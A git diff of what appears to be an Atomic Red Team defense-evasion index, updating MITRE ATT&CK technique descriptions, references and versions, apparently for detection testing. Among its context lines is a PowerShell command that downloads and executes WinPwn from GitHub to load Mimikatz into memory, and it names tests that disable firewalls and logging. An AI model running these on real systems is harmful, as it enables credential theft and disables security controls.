         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -7390,7 +7459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -7457,7 +7525,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests:
     - name: mavinject - Inject DLL into running process
@@ -7923,55 +7990,73 @@ defense-evasion:
         elevation_required: false
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests:
     - name: Windows - Modify file creation timestamp with PowerShell
@@ -8243,7 +8328,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests:
     - name: WinPwn - Reflectively load Mimik@tz into memory
@@ -8258,6 +8342,74 @@ defense-evasion:
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           mimiload -consoleoutput -noninteractive
         name: powershell
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -8321,57 +8473,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -8386,6 +8491,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -8395,9 +8506,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8407,13 +8523,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -8459,8 +8611,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -8479,13 +8631,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests:
     - name: CMSTP Executing Remote Scriptlet
@@ -8658,7 +8809,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests:
     - name: Disable Windows IIS HTTP Logging
@@ -8852,7 +9002,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -8891,8 +9041,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests:
     - name: Control Panel Items
@@ -8943,7 +9091,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -8982,12 +9130,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -9014,6 +9160,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -9031,12 +9178,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -9062,18 +9209,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -9118,13 +9264,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests:
     - name: Disable Microsoft Defender Firewall
@@ -9414,7 +9559,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -9447,7 +9592,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests:
     - name: SIP (Subject Interface Package) Hijacking via Custom DLL
@@ -9485,30 +9629,30 @@ defense-evasion:
         elevation_required: true
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -9516,9 +9660,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -9527,21 +9671,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -9581,9 +9726,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -9646,7 +9788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -9706,7 +9847,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -9747,7 +9887,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
